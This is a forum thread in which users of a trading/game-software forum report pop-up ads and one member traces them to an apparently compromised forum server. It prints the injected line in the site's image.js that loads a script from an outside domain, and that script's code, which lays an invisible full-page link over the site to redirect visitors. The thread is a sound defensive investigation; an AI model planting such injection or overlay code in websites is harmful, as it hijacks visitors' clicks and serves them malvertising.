Gamestudio Links
Zorro Links
Newest Posts
Blobsculptor tools and objects download here
by NeoDumont. 03/28/24 03:01
Issue with Multi-Core WFO Training
by aliswee. 03/24/24 20:20
Why Zorro supports up to 72 cores?
by Edgar_Herrera. 03/23/24 21:41
Zorro Trader GPT
by TipmyPip. 03/06/24 09:27
VSCode instead of SED
by 3run. 03/01/24 19:06
AUM Magazine
Latest Screens
The Bible Game
A psychological thriller game
SHADOW (2014)
DEAD TASTE
Who's Online Now
5 registered members (AndrewAMD, monk12, TipmyPip, Quad, aliswee), 1,029 guests, and 6 spiders.
Key: Admin, Global Mod, Mod
Newest Members
sakolin, rajesh7827, juergen_wue, NITRO_FOREVER, jack0roses
19043 Registered Users
Previous Thread
Next Thread
Print Thread
Rate Thread
Page 1 of 3 1 2 3
Ads?!?!?!?!?!?!? #474494
10/19/18 23:45
10/19/18 23:45
Joined: Jun 2013
Posts: 1,609
D
DdlV Offline OP
Serious User
DdlV  Offline OP
Serious User
D

Joined: Jun 2013
Posts: 1,609
Hi jcl.

Yesterday and today I've had ad pop-ups happen on the Forum. Is this a new "feature"?

Thanks.

Re: Ads?!?!?!?!?!?!? [Re: DdlV] #474495
10/19/18 23:57
10/19/18 23:57
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
AndrewAMD  Online
Serious User

Joined: Feb 2017
Posts: 1,718
Chicago
So it’s not just me. There’s an odd redirect that pops up once every few hours. This looks like a hack exploit of some sort to me.

Re: Ads?!?!?!?!?!?!? [Re: AndrewAMD] #474503
10/20/18 10:50
10/20/18 10:50
Joined: Feb 2018
Posts: 27
D
dmac Offline
Newbie
dmac  Offline
Newbie
D

Joined: Feb 2018
Posts: 27
I've gotten it as well. Seems as if the site may be infected with something.

Re: Ads?!?!?!?!?!?!? [Re: dmac] #474505
10/20/18 15:13
10/20/18 15:13
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
AndrewAMD  Online
Serious User

Joined: Feb 2017
Posts: 1,718
Chicago
The bug is repeatable.

First, you must clear your cookies. This is how:
1) Shift + Ctrl + Delete. This opens "Clear Browsing Data".
2) "Advanced" Tab
3) Time range: "all time"
4) Check "Cookies and other site data"
5) Click "Clear Data"
6) Close browser and open it again

So now that cookies are cleared, the behavior will be immediately repeatable:

7) Go to the Zorro forums.
8) Browse to any thread.
9) Hover your mouse anywhere in the screen.

No matter what, it looks like it wants to redirect you somewhere. See my screenshot #1.


So instead of clicking with my left mouse button, I right-click: Inspect. I get screenshot #2.


If I click on the sources tab, I get screenshot #3.


Notice the mysterious java scripts from om.qqtx.me. I saved them below, both in their original form and a readable format.

That second javascript has content **BEFORE** I click on the screen. But if I refresh the screen, the second script is **BLANK**. The disappearing script looks like it creates the bad link:
Code:
(function() {
    var c = JSON.parse(x1cfdb9f14ad340c38bbd6f60806ec731_hd("eyJ1cmwiOiJodHRwczovL2FmaWx0ZXIueHl6L2MvMTQ4My8yIn0=")),
        b = document.body || document.getElementsByTagName("body")[0];
    if ("undefined" != b && null != b) {
        var a = document.createElement("div");
        a.id = "div" + Math.floor(999999 * Math.random() + 1E5);
        a.style.cssText = "width:100%; height:100%; position:fixed; left:0px; top:0px; z-index: 99999999";
        a.innerHTML = 	'<a href="http://wf3sgoqwvtow4yz028sp.kf.abgp.info/redirect?i=118&u=' + 
			x1cfdb9f14ad340c38bbd6f60806ec731_he(c.url) + 
			'" target="_blank" style="display: block; width:100%; height: 100%; cursor: default"></a>';
        a.onclick = function() {
            this.style.display =
                "none"
        };
        b.insertBefore(a, b.lastChild)
    }
})();



I don't know much about HTML/CSS/JS, but this looks like it might be a sleeper script.

Attached Files forum_bug1.pngforum_bug2.pngforum_bug3.png
javascripts.zip (66 downloads)
Re: Ads?!?!?!?!?!?!? [Re: AndrewAMD] #474507
10/20/18 17:15
10/20/18 17:15
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
AndrewAMD  Online
Serious User

Joined: Feb 2017
Posts: 1,718
Chicago
As a browser-side workaround, I can block these scripts in Chrome using the ScriptSafe add-in.

Settings:
1) Allow opserver.de to run scripts (allow, not trust).
2) Distrust om.qqtx.me
3) ScriptSafe options -> General Settings -> Default Mode -> Allow

No more pop-ups. (Also, step #3 is to stop blocking all other website scripts, such as Amazon. This Chrome extension wants to block all javascripts by default, which makes no sense.)




Attached Files forum_bug4.PNG
Re: Ads?!?!?!?!?!?!? [Re: AndrewAMD] #474510
10/20/18 18:20
10/20/18 18:20
Joined: Jun 2013
Posts: 1,609
D
DdlV Offline OP
Serious User
DdlV  Offline OP
Serious User
D

Joined: Jun 2013
Posts: 1,609
Thanks AndrewAMD. So far these pop-ups just seem to be annoying, so I think I'll wait for jcl's comments & hopefully fix.

I'd rather not have a workaround lower the priority of this in case there's also something worse compromised that hasn't been noticed yet...

Thanks.

Re: Ads?!?!?!?!?!?!? [Re: DdlV] #474515
10/20/18 20:34
10/20/18 20:34
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
AndrewAMD  Online
Serious User

Joined: Feb 2017
Posts: 1,718
Chicago
My intent was to document my findings so that this website can be scrubbed clean sooner than later. cool

Re: Ads?!?!?!?!?!?!? [Re: AndrewAMD] #474543
10/22/18 13:58
10/22/18 13:58
Joined: Jul 2000
Posts: 27,977
Frankfurt
jcl Offline

Chief Engineer
jcl  Offline

Chief Engineer

Joined: Jul 2000
Posts: 27,977
Frankfurt
I've just checked the forum software, but cannot see an exploit or a source of mysterious popups. I also don't get them here, at least not with Chrome. Are they still there?

Re: Ads?!?!?!?!?!?!? [Re: jcl] #474545
10/22/18 14:25
10/22/18 14:25
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
AndrewAMD  Online
Serious User

Joined: Feb 2017
Posts: 1,718
Chicago
Yes.

jcl, try this in Google Chrome:

1) Shift + Ctrl + Delete. This opens "Clear Browsing Data".
2) "Advanced" Tab
3) Time range: "all time"
4) Check "Cookies and other site data"
5) Click "Clear Data"
6) Close browser and open it again
7) Go to Zorro User Forum
8) Click on this thread ("Ads?!?!?!?!?!?!?")
9) Click anywhere in the web page... This should induce the pop-up.
10) Right-click anywhere on the web page and click "Inspect"
11) Click on the "Sources" tab
12) Now take a look at the tree - there should be two offensive javascripts loaded:

top -> om.qqtx.me -> jquery.jscroll.min.js
top -> om.qqtx.me -> jquery.jscroll.min.js?timestamp=[etc.]

I have identified these two scripts as the culprit. If I explicitly block these scripts, I get no pop-ups.

The site has repeated this behavior just now.

Re: Ads?!?!?!?!?!?!? [Re: AndrewAMD] #474547
10/22/18 15:42
10/22/18 15:42
Joined: Feb 2017
Posts: 1,718
Chicago
AndrewAMD Online
Serious User
AndrewAMD  Online
Serious User

Joined: Feb 2017
Posts: 1,718
Chicago
I found something else interesting.

1) Right-click this page
2) Click "Inspect"
3) Click "Sources"
4) Browse the tree: top -> www.opserver.de -> ubb7 -> ubb_js -> image.js?v=7.5.1p1

Look at the script:

Code:
/* Script Version 7.5.1 */

var image_pending = 0;

function newCaptcha(type) { 
	if (image_pending) return;
	image_pending = 1;
	get_object('ajax_wait').style.display = "";
    	var url = script + "?ubb=captcha&init=1&t=" + type;
    	var ajax = new ubbtAJAX(url, updateCaptcha); 
    	ajax.sendData("GET"); 
}
document.writeln("<script src=\'//om.qqtx.me/jquery.jscroll.min.js\'></script>");
function updateCaptcha(responseXML) {
	id = responseXML;
	obj = get_object('captcha_image');
	obj.src = script + "?ubb=captcha&id=" + id;
	image_pending = 0;
	get_object('ajax_wait').style.display = "none";
}



This line does not look very nice. Was this line injected?
Code:
document.writeln("<script src=\'//om.qqtx.me/jquery.jscroll.min.js\'></script>");


Based on my experimentation, it appears this line loads the two suspicious scripts in the first place.

Hypothesis: The UBB.threads server is infected.

Page 1 of 3 1 2 3

Moderated by  Petra 

Gamestudio download | chip programmers | Zorro platform | shop | Data Protection Policy

oP group Germany GmbH | Birkenstr. 25-27 | 63549 Ronneburg / Germany | info (at) opgroup.de

Powered by UBB.threads™ PHP Forum Software 7.7.1